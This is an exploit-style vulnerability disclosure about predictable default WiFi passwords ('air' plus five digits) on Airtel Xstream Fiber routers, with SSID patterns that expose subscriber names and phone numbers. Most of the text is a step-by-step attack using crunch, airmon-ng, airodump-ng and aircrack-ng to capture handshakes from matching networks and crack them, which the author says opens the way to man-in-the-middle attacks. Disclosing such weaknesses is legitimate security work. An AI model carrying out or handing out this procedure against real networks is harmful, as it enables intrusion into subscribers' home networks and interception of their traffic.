Airtel Xstream Fiber WiFi Weak Authentication / Brute Force Vulnerability

# Exploit Title: Airtel Xstream Fiber WiFi - Usage of Weak Initial WiFi password
# Exploit Author: Alok kumar ([email protected]), Cyberpwn Technologies Pvt. Ltd.
# Vendor Homepage: https://www.airtel.in
# Product Link: https://www.airtel.in/wifi-plans
# Tested on: Airtel Xstream Fiber WiFi router with SSID Airtel_alok_4913


# It was observed that Airtel Xstream Fiber WiFi used to set the initial WiFi password for users and users were notified through an SMS on registered phone number, which are predictable and users don't get any notification to update the same. The WiFi password has a pattern of "air<5 random digits>" and potential vulnerable routers have pattern as "Airtel_<first 4 characters of subscriber's name>_<last 4 digits of subscriber's registered phone number>" and "Airtel_<10 digit subscriber's registered phone number>". Using the defined format an attacker can identify potential vulnerable SSID then crack the password offline after capturing the WiFi handshake. Successful attack can result to compromised WiFi network leading to other attacks such as MiTM.


# Create wordlist to crack the password using "crunch 5 5  0123456789 > out.txt && for x in $(cat out.txt); do echo air$x >> final_list.txt; done && rm out.txt"
# Turn on monitor mode for wifi interface using "sudo airmon-ng start wlan0"
# Scan for reachable WiFi networks using "sudo airodump-ng wlan0mon" and identify potential vulnerable SSIDs using SSID pattern.
# Use the SSID and channel number of potential vulnerable SSID to capture handshake using "sudo airodump-ng -w capture --bssid F6:27:56:XX:XX:XX -c 10 wlan0mon".
# Use previously created wordlist and captured handshake to crack WiFi password using "sudo aircrack-ng ./capture-01.cap -w ./final_list.txt"